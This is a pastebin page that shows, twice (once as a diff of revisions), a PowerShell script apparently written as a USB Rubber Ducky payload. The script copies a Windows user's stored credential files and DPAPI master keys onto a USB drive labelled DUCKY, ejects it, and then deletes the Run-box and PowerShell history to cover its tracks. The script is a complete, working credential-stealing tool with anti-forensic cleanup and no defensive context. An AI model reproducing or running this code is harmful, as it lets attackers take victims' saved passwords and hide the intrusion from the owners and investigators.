Re: Re: Re: Untitled

From reeqdsdd, 1 Month ago, written in PowerShell.

This paste is a reply to Re: Re: Untitled from advdadf - go back

Embed

Viewing differences between Re: Re: Untitled and Re: Re: Re: Untitled

# Variables
$drive = (Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
$userProfile = $Env:UserProfile

# Get the credential files
$credentialFiles = ~~@(Get-ChildItem~~ Get-ChildItem -Force ~~"${userProfile}\AppData\Local\Microsoft\Credentials\")~~

"${userProfile}\AppData\Local\Microsoft\Credentials\"
$i=1
$credentialFiles | ForEach-Object {
    $fileObj = $_
    # Get the first credential file for now
$credentialFileName = $credentialFiles[0].Name
$credentialFilePath = $credentialFiles[0].FullName

# Copy copy to ~~ducky~~
ducky
    Copy-Item ~~$credentialFilePath "${drive}:\credential1"~~

$fileObj.FullName "${drive}:\credential${i}"
    $i++
}
# Get the gUIDMasterKey
$protectFolder = (Get-ChildItem -Directory -Force "${userProfile}\AppData\Roaming\Microsoft\Protect\").FullName

# Copy master key to ducky
$index=1
Get-ChildItem -Force -Recurse $protectFolder | ForEach-Object {
    # $fileName = $_.Name
    $filePath = $_.FullName
    Copy-Item $filePath "${drive}:\key${index}"
}

# Eject
$driveEject = New-Object -ComObject Shell.Application
$driveEject.Namespace(17).ParseName("${drive}:").InvokeVerb("Eject")

# Cleanup traces

# Delete run box history
reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

# Delete Powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath

exit

Author

Title

Language

Your paste - Paste your paste here

# Variables
$drive = (Get-Volume -FileSystemLabel 'DUCKY').DriveLetter
$userProfile = $Env:UserProfile

# Get the credential files
$credentialFiles = Get-ChildItem -Force &quot;${userProfile}\AppData\Local\Microsoft\Credentials\&quot;
$i=1
$credentialFiles | ForEach-Object {
    $fileObj = $_
    # copy to ducky
    Copy-Item $fileObj.FullName &quot;${drive}:\credential${i}&quot;
    $i++
}
# Get the gUIDMasterKey
$protectFolder = (Get-ChildItem -Directory -Force &quot;${userProfile}\AppData\Roaming\Microsoft\Protect\&quot;).FullName

# Copy master key to ducky
$index=1
Get-ChildItem -Force -Recurse $protectFolder | ForEach-Object {
    # $fileName = $_.Name
    $filePath = $_.FullName
    Copy-Item $filePath &quot;${drive}:\key${index}&quot;
}

# Eject
$driveEject = New-Object -ComObject Shell.Application
$driveEject.Namespace(17).ParseName(&quot;${drive}:&quot;).InvokeVerb(&quot;Eject&quot;)

# Cleanup traces

# Delete run box history
reg.exe delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f

# Delete Powershell history
Remove-Item (Get-PSreadlineOption).HistorySavePath

exit

Private - Private paste aren't shown in recent listings.

Delete After - When should we delete your paste?

Spam protection -

{"html5":"htmlmixed","css":"css","javascript":"javascript","php":"php","python":"python","ruby":"ruby","lua":"text\/x-lua","bash":"text\/x-sh","go":"go","c":"text\/x-csrc","cpp":"text\/x-c++src","diff":"diff","latex":"stex","sql":"sql","xml":"xml","apl":"apl","asterisk":"asterisk","c_loadrunner":"text\/x-csrc","c_mac":"text\/x-csrc","coffeescript":"text\/x-coffeescript","csharp":"text\/x-csharp","d":"d","ecmascript":"javascript","erlang":"erlang","groovy":"text\/x-groovy","haskell":"text\/x-haskell","haxe":"text\/x-haxe","html4strict":"htmlmixed","java":"text\/x-java","java5":"text\/x-java","jquery":"javascript","mirc":"mirc","mysql":"sql","ocaml":"text\/x-ocaml","pascal":"text\/x-pascal","perl":"perl","perl6":"perl","plsql":"sql","properties":"text\/x-properties","q":"text\/x-q","scala":"scala","scheme":"text\/x-scheme","tcl":"text\/x-tcl","vb":"text\/x-vb","verilog":"text\/x-verilog","yaml":"text\/x-yaml","z80":"text\/x-z80"}

Re: Re: Re: Untitled

Reply to "Re: Re: Re: Untitled"